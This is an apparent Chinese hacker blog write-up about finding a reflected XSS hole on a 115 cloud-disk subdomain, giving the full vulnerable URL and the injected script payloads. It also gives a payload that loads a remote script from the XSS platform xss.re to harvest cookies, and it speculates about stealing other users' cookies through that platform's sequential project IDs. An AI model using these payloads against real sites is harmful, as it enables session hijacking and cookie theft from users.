记一次挖掘115网盘反射型xss,08xss的储存型xss
记一次对115分站简单绕过过滤继续实现xss,08xss平台也中枪!!
115反射型xss url:http://115.qiye.115.com/disk/?ac=select_public_file&ajax=1&pub=
http://115.qiye.115.com/disk/?ac=select_public_file&ajax=1&pub=<script>alert(/xss/)</script>
插入这个代码看
没弹窗我们看看源代码
在这里小伙伴们想到了什么?再来插入一次xss?对的,就是这样!!
看看源代码
===============08开始躺枪=========================
我前些天在08xss平台注册了个账号正好测试下能不能接收cookie
把url换成
http://115.qiye.115.com/disk/?ac=select_public_file&ajax=1&pub=<script>alert(/xss/)</script><scriptsrc=http://xss.re/xxx></script>;
入库就对了!!哇哈哈!!~~
下面属于我的想象
08平台这个xss能不能利用呢?
我想到几点,首先这个平台的项目都是有顺序的,在某网站插入代码
www.xx.com/info.php?id=<script src=http://xss.re/别人的项目代码></script>
<script src=http://xss.re/我的项目代码></script>
也就是说先执行别人的代码然后别人查看这个项目就中招了。
这是我的想象,具体的没怎么测试,这个有待挖掘,这个项目是顺序的,我的是1,下一个别人创建的就是2了,这样利用起来方便,就是不知道能不能执行成功。
==============================================
上面是去年写的
下面是我刚刚猜想的,
既然代码是可以执行的,也就是说插入别人的代码在前面就先弹别人的?
插入http://www.baidu.com/info.php?id=<script scr=08xss.re/13></script><script scr=08xss.re/14></script>
是先执行别人的,但是在08xss平台里面,你先执行别人的代码有用吗?
你执行完之后是不是你的cookie发到别人的xss平台里面?
所以说得先让别人查看他的项目然后劫持到他的coookie,这个也不好利用
具体的你们自己测试吧,我懒得看这种。想多了头疼